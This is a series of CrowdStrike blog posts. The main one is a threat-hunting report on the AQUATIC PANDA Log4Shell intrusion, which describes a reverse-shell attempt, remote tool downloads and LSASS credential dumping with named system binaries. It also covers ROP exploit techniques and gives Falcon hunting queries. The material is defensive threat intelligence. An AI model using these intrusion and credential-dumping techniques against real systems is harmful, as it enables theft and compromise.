Taking an adversary-focused approach arms security and incident response (IR) teams with a higher level of context about the situation they are facing. By leveraging threat intelligence and mixing it with continuous visibility, organizations can better defend their assets. Pre-runtime and compliance data alone will not provide IR teams with the type of comprehensive data they need — they require as much data as possible to support their investigations and get a complete picture of what is happening.  

Visibility is critical. If an attacker is taking advantage of a lack of outbound communication restrictions to exfiltrate data, organizations have to be able to detect that and enforce policies to block it. The principle of least privilege should be a governing idea of any security strategy, particularly one being applied to a cloud environment where the concept of the traditional perimeter is essentially nonexistent. Knowing how threat actors are trying to access cloud resources better positions organizations to lock down cloud applications and resources and reduce risk. Locking the doors to your home to keep out intruders is fine, but what do you do when the burglar comes in through the window? 

Seeing the Bigger Picture

Thinking like an attacker and knowing their tactics, techniques and procedures (TTPs) is a fundamental part of protecting IT infrastructure. The attack surface of the cloud — with its dynamic mix of containers, virtual machines, microservices and more — is complex and growing. With attackers circling, it would be a mistake for organizations to focus on the cloud less than attackers do. Attacks are not always direct — sometimes, adversaries strike the on-premises environment first and then go after cloud resources. In a hybrid IT world, organizations need to be able to extend the security controls protecting their on-premises environment beyond to the cloud to maintain consistency and compliance. 

True security requires the ability to collect, correlate and properly leverage information about users, endpoints and assets regardless of where they reside. Cloud secure workload protection platforms and agentless cloud security posture management solutions only provide part of the picture. For hybrid environments, security must be thought of in a holistic and integrated fashion that is informed by real-time threat intelligence and visibility. CrowdStrike advocates for organizations to think like an attacker, examining their activity, tactics and techniques to better understand how they’ll target your organization so you can detect and remediate malicious activity.

Additional Resources

OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt

Following the Dec. 9, 2021, announcement of the Log4j vulnerability, CVE 2021-44228, CrowdStrike Falcon OverWatch™ has provided customers with unrivaled protection and 24/7/365 vigilance in the face of heightened uncertainty. 

To OverWatch, Log4Shell is simply the latest vulnerability to exploit — a new access vector among a sea of many others. Adversarial behavior post-exploitation remains substantially unchanged, and it is this behavior that OverWatch threat hunters are trained to detect and disrupt. OverWatch’s human-driven hunting workflows and patented tooling make it uniquely agile in the face of rapidly evolving cyber threats. 

Since the vulnerability was announced, OverWatch threat hunters have been continuously ingesting the latest insights about the Log4j vulnerability as well as publicly disclosed exploit methods to influence their continuous hunting operations. On Dec. 14, 2021, VMware issued guidance around elements of VMware’s Horizon service found to be vulnerable to Log4j exploits. This led OverWatch to hunt for unusual child processes associated with the VMware Horizon Tomcat web server service during routine operations. 

On the back of this updated hunting lead, OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion. Thanks to the quick action of OverWatch threat hunters, the victim organization received the context-rich alerts they needed to begin their incident response protocol.

OverWatch’s Rapid Notification Process Disrupts AQUATIC PANDA

OverWatch threat hunters observed the threat actor performing multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance. OverWatch has observed multiple threat actors utilizing publicly accessible DNS logging services like dns[.]1433[.]eu[.]org during exploit attempts in order to identify vulnerable servers when they connect back to the attacker-controlled DNS service.

Figure 1. Initial suspicious reconnaissance commands identified by OverWatch

The threat actor then executed a series of Linux commands, including attempting to execute a  bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat actor tooling hosted on remote infrastructure. Our CrowdStrike Intelligence team later linked the infrastructure to the threat actor known as AQUATIC PANDA. (Read more about AQUATIC PANDA at the end of this post.)

The execution of Linux commands on a Windows host under the Apache Tomcat service immediately drew the attention of OverWatch threat hunters. After triaging this initial burst of activity, OverWatch immediately sent a critical detection to the victim organization’s CrowdStrike Falcon® platform and shared additional details directly with their security team.

Figure 2. Failed attempts to execute Linux commands on a Windows host

Based on the telemetry available to OverWatch threat hunters and additional findings made by CrowdStrike Intelligence, CrowdStrike assesses that a modified version of the Log4j exploit was likely used during the course of the threat actor’s operations.

Figure 3. Suspected Log4j exploits found in AQUATIC PANDA’s possession

Using the telemetry discovered through intelligence analysis of the JNDI-Injection-Exploit-1.0.jar file, OverWatch was able to confirm that the same file was released on a public GitHub project on Dec. 13, 2021, as seen in Figure 4 below, and was potentially utilized in order to gain access to the vulnerable instance of VMware Horizon based on follow-on activity observed by OverWatch.

Figure 4. GitHub project with Log4j exploit — hxxps[:]//github[.]com/dbgee/log4j2_rce (Click to enlarge)

AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. OverWatch threat hunters also observed an attempt to discover and stop a third-party endpoint detection and response (EDR) service. 

OverWatch continued to track the threat actor’s malicious behavior as they downloaded additional scripts and then executed a Base64-encoded command via PowerShell1 to retrieve malware from their toolkit.

OverWatch observed the threat actor retrieve three files with VBS file extensions from remote infrastructure. These files were then decoded using cscript.exe into an EXE, DLL and DAT file respectively. Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking.2

Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe and cdump.exe — a renamed copy of createdump.exe. The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\temp\ directories.

Figure 5. Example command line used in attempted memory dump

Figure 6. Falcon platform telemetry capturing threat actor actions

Throughout the intrusion, OverWatch tracked the threat actor’s activity closely in order to provide continuous updates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host. 

The discussion globally around Log4j has been intense, putting many organizations on edge. No organization wants to hear about such a potentially destructive vulnerability affecting its networks. It is in these times of great uncertainty that the true value of continuous threat hunting is brought to light. OverWatch searches for evidence of malicious behavior — not adversary entry points. Although new vulnerabilities present adversaries with a new entry vector, they do not change the hands-on-keyboard activity OverWatch threat hunters are trained to detect and disrupt. 

To stay current on how to protect against this latest vulnerability, CrowdStrike’s overall mitigation advice for Log4j is being updated as new information comes to light.

AQUATIC PANDA

AQUATIC PANDA is a China-based targeted intrusion adversary with a dual mission of intelligence collection and industrial espionage. It has likely operated since at least May 2020. AQUATIC PANDA operations have primarily focused on entities in the telecommunications, technology and government sectors. AQUATIC PANDA relies heavily on Cobalt Strike, and its toolset includes the unique Cobalt Strike downloader tracked as FishMaster. AQUATIC PANDA has also been observed delivering njRAT payloads to targets.

Endnotes

  1. Learn more about this technique at https://attack.mitre.org/techniques/T1132/001/ and https://attack.mitre.org/techniques/T1059/001/.
  2. Learn more about this technique at https://attack.mitre.org/techniques/T1574/001/.
  3. Learn more about this technique at https://attack.mitre.org/techniques/T1003/001/.

Additional Resources

CrowdStrike Changes Designation of Principal Executive Office to Austin, Texas

28 December 2021 at 20:55

Since we founded CrowdStrike, we’ve paved the way as one of the most prominent remote-first companies. We’ve planted roots in communities around the world — from Sunnyvale to London and from Pune to Tokyo. This not only gave us a running start at reimagining the workplace for today’s remote-first world, it also meant that we were never tied to a single location, hiring the best in the business no matter where they’re based. While the traditional notion of a singular headquarters is not required and may become obsolete altogether in today’s transforming world, the Securities and Exchange Commission requires us to designate a principal executive office. Today, CrowdStrike Holdings is designating Austin, Texas as our principal executive office.   

While Austin is already CrowdStrike’s largest office in the U.S., our Sunnyvale location will continue to be a critical innovation hub in the heart of Silicon Valley. No people, jobs or facilities will be impacted by this decision. CrowdStrike will continue to grow and build our team of best-in-business experts as a truly remote-first leader in the cybersecurity industry, investing in all of the states, countries and communities where our team resides.

How to Speed Investigations with Falcon Forensics

22 December 2021 at 15:26

Introduction

Threat hunters and incident responders are under tremendous time pressure to investigate breaches and incidents. While they are collecting and sorting massive quantities of forensic data, fast response is critical to help limit any damage inflected by the adversary. This article and video will provide an overview of Falcon Forensics, and how it streamlines the collection and analysis of point-in-time and historic forensic data.

Video

Deploying Falcon Forensics

To facilitate the collection of Forensics data, CrowdStrike provides dissolvable agents for Windows, Mac and Linux that can be downloaded from the “Host -> Sensor Downloads” page in the Falcon UI under “Tool Downloads”. Those executables can then be deployed via Real Time Response or other software deployment tools. Once deployed and executed, CrowdStrike Falcon Forensics collects a snapshot of both forensic and point-in-time triage data from the host.

The resulting data is then made available in the cloud. It can be exported via FDR or viewed through the Falcon user interface and a number of pre-configured dashboards. The Deployment Status dashboard highlights how many systems have the tool installed along with the number of collections in the past 24 hours. In addition to breakdowns by operating system and role, the hosts can be filtered by Agent ID and system name.

forensics deployment status

Analyzing Forensics Data

There are two main dashboards available to review the collected Forensics data. On the Host Info page, there are options to search by hostname and collection time. The dashboard provides a summary of events by source name as well as a count of Falcon Forensics Modules by source type. 

forensics host info

The Users information highlights potential areas of concern around account status, and admin privileges as well as failed login attempts. This page also includes details on process information, network processes, network interfaces and shim cache.

forensics host info users

The Host Timeline report can be used to look at a specific host or a multi system view over a defined period of time. The event types are color coded with the option to focus on them individually. Highlighting a specific section of the timeline filters the support list to show only events during that window of time. Those events can also be further filtered by system name and source type as well as time and custom fields.

forensics host timeline

Quick Wins with Forensics

In addition to host based and custom searches, Falcon Forensics also includes a dashboard for quick wins. By providing a list of panel groups, this feature helps organizations identify activity with a higher signal-to-noise ratio. It offers low-hanging fruit for analysts to quickly identify potential misconfigurations or hacker activity.

forensic quick wins

This example uses the registry to report a list of processes that could be victim to a specific MITRE technique related to Image File Execution Options. These quick win reports give analysts easy access to drill in on specific, potential misconfigurations or attacker driven activity.

forensics registry wins

Conclusion

Falcon Forensics streamlines the collection of point-in-time and historic forensic triage data for robust analysis of cybersecurity incidents. With predefined dashboards and flexible search options, responders can quickly identify relevant data and speed investigations.

More resources

CrowdStrike Strengthens Exploit Protection Using Intel CPU Telemetry

  • Falcon adds a new feature that uses Intel hardware capabilities to detect complex attack techniques that are notoriously hard to detect.
  • CrowdStrike’s new Hardware Enhanced Exploit Detection feature delivers memory safety protections for a large number of customers on older PCs that lack modern in-built protections.
  • Once activated, the new feature detects exploits by analyzing suspicious operations associated with exploit techniques, such as shellcode injection, return-oriented programming and others, strengthening CrowdStrike’s existing layered protection against sophisticated adversaries and threats throughout the attack chain.

CrowdStrike’s goal is to stop breaches — and we do that better than any cybersecurity company in the world. As attackers advance their tactics and techniques, we continually refine our tools and capabilities to stay ahead of them. We recently added a new feature to the CrowdStrike Falcon® sensor: Hardware Enhanced Exploit Detection, which uses hardware capabilities to detect complex attack techniques that are notoriously hard for software alone to detect and prevent. With the release of version 6.27 of the Falcon sensor, this feature is now available on systems with Intel CPUs, sixth generation or newer, running Windows 10 RS4 or later.

Falcon Hardware Enhanced Exploit Detection leverages a CPU feature developed by Intel called Intel Processor Trace (Intel PT) that delivers extensive telemetry useful for the detection and prevention of code reuse exploits. Intel PT records code execution on the processor and is often used for performance diagnosis and analysis. Intel PT allows the CPU to continuously write information about the currently executing code into a memory buffer, which can be used to reconstruct the exact control flow. The primary usage scenario is to trace an executable while it runs, store the trace on the disk and afterward analyze it to reproduce the exact sequence of instructions that has been executed. The program behavior visibility provided by this feature makes it useful for security exploit detection and investigation as well.

If Intel PT  is enabled and supported by the machine, the Falcon sensor will enable execution tracing for a selected set of programs. Whenever the program executes a critical system service (like creating a new process), the sensor will analyze the captured trace to look for suspicious operations. This innovative approach to exploit detection is already proving valuable and has detected several return-oriented programming-based (ROP) exploit chains triggered by vulnerabilities such as CVE-2019-17026, which targets FireFox.

To fully understand this feature, it’s important to first understand the attacker’s technique, which is often the first step in an attack chain leading to a breach. This chain involves a series of actions perpetrated by an adversary or malicious software and can include some or all of the following: initial access, execution, gaining persistence, privilege escalation, defense evasion, credential access, network discovery, lateral movement, collection, command and control, and exfiltration.

The Falcon sensor provides visibility into many of these steps, using machine learning and artificial intelligence along with indicators of attack (IOAs) to correlate certain attacker behaviors to detections. This allows Falcon to interrupt the attack chain at multiple points to prevent further actions, before any damage is done. The earlier in the chain this can be achieved, the better.

Exploits to Gain Initial Access

One of the early mechanisms used by adversaries for initial access is exploiting vulnerabilities in software to achieve execution of malicious code. There are countless ways of achieving this, usually starting by making a vulnerable application or service process a maliciously crafted input, like a file or network packet, that triggers a bug, like a buffer overflow or use-after-free, which through one or more exploitation techniques eventually leads to code execution controlled by the attacker. Some of these techniques are shellcode injection, return-oriented programming, call-oriented programming, counterfeit object-oriented programming and jump-oriented programming.

Shellcode Injection

This technique places the malicious code (aka “shell code”) into a stack or heap buffer and then uses a software bug to overwrite a function’s return address or a function pointer to point to the malicious code. As soon as the function returns, or the overwritten function pointer is used, the shell code is executed. Since the widespread introduction of Data Execution Prevention (DEP), which prevents the CPU from executing instructions on the stack and heap by marking it as non-executable (NX), this technique requires the attacker to first change the memory protection on the injected shell code to remove the NX protection. Therefore, it requires at least one more exploit technique to modify the memory protection. This has led to code-reuse attacks, which execute small pieces of code from the program itself or its libraries. The most well-known variant of these attack methods is return-oriented programming, or ROP.

Return-oriented Programming (ROP)

This technique bypasses DEP by getting rid of shellcodes entirely and reusing existing code from the executable or loaded DLLs. Instead of placing the malicious code directly into memory, a stack buffer is filled with the addresses of ROP “gadgets” — small pieces of code that consist of a few instructions followed by a return instruction. The attacker then abuses a software bug to overwrite a function’s return address to point to the first ROP gadget, which consists of instructions to adjust the stack pointer so that it points to the buffer containing the addresses of the following ROP gadgets, which can be on the stack or on the heap. Each gadget will execute a few instructions and then “return” to the next gadget address on the stack. By chaining appropriate ROP gadgets, an attacker can craft a chain of instructions that lead to the desired operation like bypassing DEP, loading a DLL or starting a new process. If the ROP chain is carefully crafted, it can even clean up the traces of the stack manipulation — like pivoting the stack pointer to a heap address — before executing the final operation, so that it becomes difficult to detect by just analyzing the call stack.

For example, here’s a simple demonstration of ROP. Function Foo() calls function Bar(), pushing the return address on the stack. Function Bar() contains a vulnerability that allows an attacker to take control of the stack and overwrite the return address, placing the address of a malicious shellcode there instead. Once the function returns, the malicious return address is called and the shellcode executes:

Other Code-reuse Attacks

There are a few other techniques that attackers can use instead of or in combination with ROP:

  • Call-oriented programming (COP): This technique is similar to ROP, but instead of overwriting the return address on the stack, it overwrites a function pointer. This can be useful to initialize an exploit, as it can be easier to leverage a buffer overflow to overwrite a function pointer on the stack or on the heap than to overwrite the return address on the stack without destroying the stack cookie.
  • Counterfeit object-oriented programming (COOP): This technique uses a C++ object with virtual methods to redirect the flow of execution. Instead of modifying a function pointer directly, a v-table pointer in an object is overwritten.
  • Jump-oriented programming (JOP): This technique uses an indirect jmp instruction in the software to redirect execution to an attacker-controlled location. Instead of chaining return addresses, JOP usually uses a table of addresses of JOP gadgets together with a so-called “dispatcher gadget”: a small piece of code that increments a register value to point to the next address in the jump table and then does an indirect jump to that address. The JOP gadget in turn executes a few instructions and then does an indirect jump back to the dispatcher gadget.

Existing Countermeasures

Different mechanisms exist to prevent or detect these exploits, including stack cookies, control flow integrity, call stack analysis and Intel CET. Unfortunately, many of these approaches have limitations reducing their effectiveness, as we discuss next.

Stack Cookies

A stack cookie is a value that is placed on the stack, between the local variables and the return address. The compiler will generate code that initializes the stack cookie on function entry by XORing a magic value with the current stack pointer, and subsequently checks the value before returning to the caller and crashes the process if the value doesn’t match the expected one. This mechanism is typically only added to functions that use stack buffers, which could suffer from a buffer overflow bug, preventing it from being abused to overwrite the return address.

Control Flow Integrity (CFI)

Control flow integrity describes a family of mechanisms that attempt to protect indirect calls (e.g., from function pointers or virtual methods) from being manipulated. This is done by inserting compiler-generated code that validates that the target of an indirect call is a legitimate call target.

On Windows, this protection mechanism is called Control Flow Guard (CFG). To validate the call target, a bitmap is used, which is generated by the kernel from metadata in the images of all loaded DLLs and executables and mapped into the address space of every process that supports it. Each bit represents 8 bytes of code, resulting in a huge bitmap. Unfortunately, CFG needs to be enabled with a compiler flag and it isn’t widely adopted yet. It cannot be enforced on DLLs that were compiled without CFG, and for processes that have it disabled, it’s automatically disabled for all system DLLs as well, even though they support it.

Windows 11 has an improved mechanism called Extreme Flow Guard (XFG). Here the compiler inserts a 64-bit hash of the function signature before each function. For each indirect function call, the compiler generates instructions that load both the function pointer and the hash of the function to be called into registers followed by a call to a dispatch function that first validates whether the hash matches the one stored before the target function, before jumping to the target. The current implementation in the pre-release of Windows 11 is rather useless, though, because a hash mismatch (as well as an unaligned target address) simply leads to a fallback to bitmap-based CFG.

Call Stack Analysis

While all previously described mitigations are implemented through the operating system, security software has its own ways of detecting such techniques. For example, security software can intercept certain system functions and analyze the call stack for signs of manipulation, like a stack frame outside of the actual stack or return addresses on the stack that do not match any call instructions.

This is typically a sign of a ROP exploit. But more sophisticated exploits are able to restore the stack into a sane state before calling any system services, making it almost impossible to detect the exploitation just by looking at the stack, after the exploitation has taken place.

Intel CET

Since “Tiger Lake,” Intel CPUs support a feature called Control-Flow Enforcement Technology (Intel CET). It provides two features to protect from code-reuse attacks: indirect branch tracking (IBT) and shadow stack (SS). IBT adds the ENDBR instruction, which marks legitimate targets of indirect calls and jumps, disallowing indirect jumps and calls to any other instruction. Shadow stack, which is inaccessible to user mode, automatically stores copies of return addresses from the normal stack and detects mismatches of the return value between the normal stack and shadow stack. It is supported by Windows 10 RS5.

CrowdStrike’s Alternate Approach

While a number of viable solutions exist, they are either limited in their protection (stack cookies, stack analysis) or require support from the compiler and OS, and in the case of Intel CET, require a modern PC refresh. It can be expected that unprotected software will be around for many years to come.

To address the issue now for existing software, an alternate approach is needed. To address this, we investigated the use of Intel Processor Trace to implement a software solution.

Intel Processor Trace

Intel Processor Trace, or Intel PT, is a CPU feature present on Intel CPUs since the fifth generation (“Broadwell”). It allows the CPU to continuously write information about the currently executing code into a memory buffer, which can be used to reconstruct the exact control flow. The primary usage scenario is to trace an executable while it runs, store the trace on the disk and afterward analyze it to reproduce the exact sequence of instructions that has been executed. In this scenario, the analysis doesn’t need to be extremely fast, but the capture of the trace still needs to be efficient to not excessively slow down the process’ execution.

To achieve this, the CPU writes the trace using packets that are extremely optimized for size, resulting in an overhead of only a few percent.

To minimize the amount of data to write, the CPU doesn’t store any information that can be reproduced from the executable code, which is expected to be available for analysis.

For example, the CPU will only write a packet when execution is going to a location that cannot be determined from the instruction being executed. This means execution of direct jumps and calls, which have target addresses hardcoded in the binary, will not cause a packet to be generated. Indirect calls and jumps, as well as returns, which cannot be derived from the executable code, will result in a packet that specifies the target address of the instruction.

Another operation that results in packet generation is a conditional jump. For such a jump, the target is already encoded in the executable, so the only information needed is whether the branch was taken or not, which can be represented by a single bit. To achieve this, the CPU will write a packet type called Taken Not Taken (TNT) packets into the buffer, which will store multiple bits, each representing a single conditional jump.

Another optimization is not writing the full target address of an indirect jump, but only the lowest bytes of the target address, since the top bytes usually remain the same. This usually reduces a packet from 9 bytes to 5 bytes or even 3.

Configuration

Intel PT is configured using model-specific registers (MSRs). These registers exist per CPU core and thus affect tracing on a per-CPU basis. To capture the trace of an application, it is necessary to collect the trace on a per-thread level. To achieve this, the operating system needs to save and restore these MSRs on each thread-context switch. This is done by using the XSAVES and XRSTORS instructions, which allow the operating system kernel to save and restore different register sets. These are extended versions of older XSAVE and XRSTOR, which only allowed to save and restore generic user-mode available registers and could thus be executed in user mode. The S suffix in the new instructions indicates “Supervisor” mode (or kernel mode), allows to save and restore the privileged CPU state and can only be executed by the kernel. Starting from the sixth generation, Intel CPUs (“Skylake”) can save and restore the Intel PT state MSRs with these instructions. Additionally, the OS needs to support this. Windows 10 implements this since RS4.

Using Intel PT to Detect Exploitation

Being able to capture the execution trace of an application, security software that runs in the kernel now has the ability to look for code reuse attacks by parsing the captured trace packets together with the executed instructions in the address space of the application. Being able to decode the instructions relies on them still being present when the packets are being analyzed. This is almost always the case, when the number of analyzed instructions doesn’t get too large.

While it is generally desirable to keep the number of instructions in the buffer low to reduce the analysis cost, it also has to be large enough to fully cover larger library functions, like CreateProcess, which execute a large amount of instructions before switching to kernel mode, so that the exploit that led to the call to it is still in the buffer when the kernel mode service is finally called.

In its analysis, security software can now check for different suspicious operations, like returns not matching calls, suspicious stack pointer loads, excessive use of indirect calls and jumps, and more.

Falcon Hardware Enhanced Exploit Detection

With the release of version 6.27, the CrowdStrike Falcon sensor has a new feature called Hardware Enhanced Exploit Detection, which leverages Intel PT in the way described above.

If the feature is enabled and supported by the machine, the sensor will enable execution tracing for a selected set of programs. Whenever the program executes a critical system service (like creating a new process), the sensor will analyze the captured trace to look for suspicious operations. Due to the requirements mentioned above, the feature is only available on systems with Intel CPUs of the sixth generation or newer, running Windows 10 RS4 or later.

Operation

For each process that is selected for trace analysis, each thread will be configured to enable tracing of all user mode code. A trace buffer is allocated for each thread (32 KB has been shown to be sufficient), and the MSRs are configured in the context of the thread. Windows will save and restore the configuration MSRs on each thread context switch, thus making sure the trace buffer will only contain the traces from this thread.

Kernel mode callbacks with configurable pre-filtering decide when an analysis is due and then run the analyzer, again in the context of the thread that is performing the operation.

The analyzer decodes the packets written in the trace buffer and decodes instructions as needed to reproduce the control flow.

To efficiently decode the trace, the analyzer uses a custom PT packet decoder that is optimized for the required operations it needs to perform. Additionally, it uses a highly optimized instruction decoder, which is able to decode tens of millions of instructions per second. This allows the analyzer to decode and validate a trace buffer that is large enough to cover calls to functions like CreateProcess in a few milliseconds. A typical analysis processes around 130,000 instructions in around 5 milliseconds. Obviously, this is still an overhead that can result in slowdown of the application if done too often. Therefore, analysis needs to be triggered only rarely, like when a new process is created or a new dll is loaded. Pre-filtering based on the invoked system call and the parameters of the events helps reduce the number of analysis operations and configurable size of the analyzed buffer, and as a result, can reduce the analysis duration.

One method of analysis is maintaining a “shadow stack,” which records the addresses of call instructions and subsequently validates the targets of return instructions to match them. 

Whenever a call instruction is decoded, the analyzer will add an entry to the shadow stack, and whenever a ret is decoded, the analyzer will pop an entry from the shadow stack and compare it with the target IP that was captured in the trace buffer. Mismatches are recorded.

Since the trace will start at an arbitrary location (e.g., from deep within a call chain), the shadow stack might not be built or might be already empty when a return is found. As a fallback, when no entries are present in the shadow stack — thus the legitimate return address is unknown to the analyzer — it checks whether the target address is after a call instruction.

When an application is exploited using ROP and a system call was invoked as a result of a ROP chain, the execution trace would contain a number of returns that don’t match the recording from a shadow stack and in the majority of cases also don’t return to an address found immediately after a call instruction. Additional indicators of exploitation are sequences of short gadgets followed by a ret and unusual stack pointer-modifying operations.

Whenever the analyzer encounters one of these, it is considered a potential ROP gadget. During the analysis, data is collected, and then evaluated afterward to decide whether a ROP attack is likely based on the data.

False Positive Mitigation

As already mentioned, the binary code that the trace has recorded executing is usually still in memory. There can be cases, though, when it is not. For example, JIT code might have been deallocated or overwritten after it was executed, but before the analysis happens. This can lead to being unable to follow the execution trace, or even misinterpretation of it. There are mitigations in the analyzer that will detect such scenarios and avoid accumulating false positives. Additionally, the analyzer collects telemetry data about decoding failures, allowing config to selectively disregard the results.

Detection

As of Falcon sensor version 6.27, we have added a new detection (SuspiciousExecutionTrace) and a telemetry event (PtTelemetry) that accompanies it. Early analysis shows that this approach to exploit detection will prove fruitful as we have been able to demonstrate detection efficacy on a number of ROP-based exploit chains triggered by vulnerabilities such as CVE-2019-17026, which targets FireFox.

(Click to enlarge)

Summary

In our mission to stop breaches, CrowdStrike strives to continually expand our suite of exploit detection and prevention capabilities. Many CPU features, such as Intel PT, are underutilized and can be efficiently leveraged to detect and prevent exploits, and we will continue to invest in these CPU technologies to bring innovative capabilities to the Falcon sensor. It is essential to mention that CrowdStrike Falcon takes a layered approach to protecting customers against exploits and advanced threats by using machine learning (on sensor and in the cloud) and behavior-based detection using IOAs. Customers who run the Falcon sensor on virtual machines or other configurations that do not support Falcon Hardware-Enhanced Exploit Detection are still fully protected by Falcon’s layered approach to securing customer environments.

Additional Resources

Baselining and Hunting Log4Shell with the CrowdStrike Falcon Platform

23 December 2021 at 16:09

Note: This post first appeared in r/CrowdStrike.

First and foremost: if you’re reading this post, I hope you’re doing well and have been able to achieve some semblance of balance between life and work. It has been, I think we can all agree, a wild December in cybersecurity (again). 

At this time, it’s very likely that you and your team are in the throes of hunting, assessing and patching implementations of Log4j2 in your environment. It is also very likely that this is not your first iteration through that process. 

While it’s far too early for a full hot wash, we thought it might be beneficial to publish a post that describes what we, as incident responders, can do to help mitigate some threat surface as patching marches on.

Hunting and Profiling Log4j2

As wild as it sounds, locating where Log4j2 exists on endpoints is no small feat. Log4j2 is a Java module and, as such, can be embedded within Java Archive (JAR) or Web Application Archive (WAR) files, placed on disk in not-so-obviously-named directories, and invoked in an infinite number of ways. In addition, Log4j2 files may be embedded deep inside of nested archive files (a JAR within a JAR within a JAR).

CrowdStrike has published a dedicated dashboard to assist Falcon® customers in locating Log4j and Log4j2 as it is executed and exploited on endpoints (US-1 | US-2 | EU-1 | US-GOV-1). 

CrowdStrike has also released a free, open-source tool to assist in locating Log4j and Log4j2 on Windows, macOS and Linux systems. Additional details on that tool can be found on our blog.

While applying vendor-recommended patches and mitigations should be given the highest priority, there are other security controls we can use to try and reduce the amount of risk surface created by Log4j2. Below, we’ll review two specific tools: Falcon Endpoint and Firewalls/Web Application Firewalls.

Profiling Log4j2 with Falcon Endpoint

If a vulnerable Log4j2 instance is running, it is accepting data, processing data and acting upon that data. Until patched, a vulnerable Log4j2 instance will process and execute malicious strings via the JNDI class. Below is an example of a CVE-2021-44228 attack sequence:

(Click to enlarge)

When exploitation occurs, what will often be seen by Falcon is the Java process — which has Log4j2 embedded/running within it — spawn another, unexpected process. It’s with this knowledge we can begin to use Falcon to profile Java to see what, historically, it commonly spawns. 

To be clear: Falcon is providing prevention and detection coverage for post-exploitation activities associated with Log4Shell right out of the box. What we want to do in this exercise is try to surface low-and-slow signals that might be trying to hide amongst the noise or activity that has not yet risen to the level of a detection.

At this point, you (hopefully!) have a list of systems that are known to be running Log4j2 in your environment. If not, you can use the Falcon Log4Shell dashboards referenced above. In Event Search, the following query will shed some light on Java activity from a process lineage perspective:

index=main sourcetype=ProcessRollup2* event_simpleName=ProcessRollup2
| search ComputerName IN (*), ParentBaseFileName IN (java, java.exe)
| stats dc(aid) as uniqueEndpoints, count(aid) as executionCount by event_platform, ParentBaseFileName, FileName
| sort +event_platform, -executionCount

Output will look similar to this:

(Click to enlarge)

Next, we want to focus on a single operating system and the hosts that we know are running Log4j2. We can add more detail to the second line of our query:

[...]
| search event_platform IN (Mac), ComputerName IN (MD-*), ParentBaseFileName IN (java, java.exe)
[...]

We’re keying in on macOS systems with hostnames that start with MD-. If you have a full list of hostnames, they can be entered and separated with commas. The output now looks like this:

(Click to enlarge)

This is how we can interpret the results above: over the past seven days, we have three endpoints in scope (they all have hostnames that start with MD-). In that time, Falcon has observed Java spawning three different processes: jspawnhelper, who and users. The hypothesis is: if Java spawns a program that is not in the list above, that is uncommon in the environment we’re baselining and we want to create a signal in Falcon that will tell our SOC to investigate that execution event.

There are two paths we can take from here in Falcon to achieve this goal: Scheduled Searches and Custom IOAs. We’ll go in order.

Scheduled Searches

Creating a Scheduled Search from within Event Search is simple.We’re going to add a line to the query to omit the programs that we expect to see (optional) and then ask Falcon to periodically run the following for us:

index=main sourcetype=ProcessRollup2* event_simpleName=ProcessRollup2
| search event_platform IN (Mac), ComputerName IN (MD-*), ParentBaseFileName IN (java, java.exe)
| stats dc(aid) as uniqueEndpoints, count(aid) as executionCount by event_platform, ParentBaseFileName, FileName
| search NOT FileName IN (jspawnhelper, who, users)
| sort +event_platform, -executionCount

You can see the second line from the bottom excludes the processes we’re expecting to see based on the results of our first query. 

To schedule, the steps are:

  1. Run the query.
  2. Click “Schedule Search” which is located just below the time picker.
  3. Provide a name, output format, schedule, and notification preference.
  4. Done.

(Click to enlarge)

Our query will now run every six hours…

(Click to enlarge)

…and send the SOC a Slack message if there are results that need to be investigated.

(Click to enlarge)

Custom IOA

Custom indicators of attack (IOAs) are also simple to set up and provide real-time — as opposed to batched — alerting. To start, let’s make a Custom IOA Rule Group for our new IOA:

(Click to enlarge)

Next, we’ll create our rule and give it a name and description that help our SOC identify what it is, define the severity and provide Falcon handling instructions.

(Click to enlarge)

I always recommend a crawl-walk-run methodology when implementing new Custom IOAs. For “Action to Take” I start with “Monitor” — which will only create Event Search telemetry. If no other adjustments are needed to the IOA logic after an appropriate soak test, I then promote the IOA to a Detect  — which will create detections in the Falcon console. Then, if desired, I promote to the IOA to Prevent — which will terminate the offending process and create a detection in the console.

Be mindful: Log4j2 is most commonly found running on servers. Creating any IOA that terminates processes running on server workloads should be thoroughly vetted and the consequences fully understood prior to implementation. 

Our rule logic uses regular expressions. The syntax looks as follows:

(Click to enlarge)

Next we click “Add” and enable the Custom IOA Rule Group and Rule.

When it comes to assigning this rule group to hosts, I recommend applying a Sensor Grouping Tag to all systems that have been identified as running Log4j2 via Host Management. This way, these systems can be easily grouped and custom Prevention Policies and IOA Rule Groups applied as desired.

Custom IOAs in “Monitor” mode can be viewed by searching for their designated Rule ID in Event Search.

(Click to enlarge)

Example query to check on how many times rule has triggered:

event_simpleName=CustomIOABasicProcessDetectionInfoEvent TemplateInstanceId_decimal=26 
|  stats dc(aid) as endpointCount, count(aid) as alertCount by ParentImageFileName, ImageFileName, CommandLine

If you’ve selected anything other than “Monitor” as the Action to Take, rule violations will be in the Detections view in the Falcon console.

As always, Custom IOAs should be created, scoped, tuned and monitored to achieve the absolute best results. Narrowing and grouping similar Log4j2 systems for baselining will yield great results.

Profiling Log4j2 with Firewall and Web Application Firewall

We can apply the same principles we used above with other, non-Falcon security tooling as well. The JNDI class impacted by CVE-2021-44228, supports a fixed number of protocols, including:

  • dns
  • ldap
  • rmi
  • ldaps
  • corba
  • iiop
  • nis
  • nds

Just like we did with Falcon and the Java process, we can use available network tooling to baseline the impacted protocols on systems running Log4j2 and use that data to create network policies that restrict communication to only those required for service operation. These controls can help mitigate the initial “beacon back” to command and control infrastructure that occurs once a vulnerable Log4j2 instance processes a weaponized JNDI string.

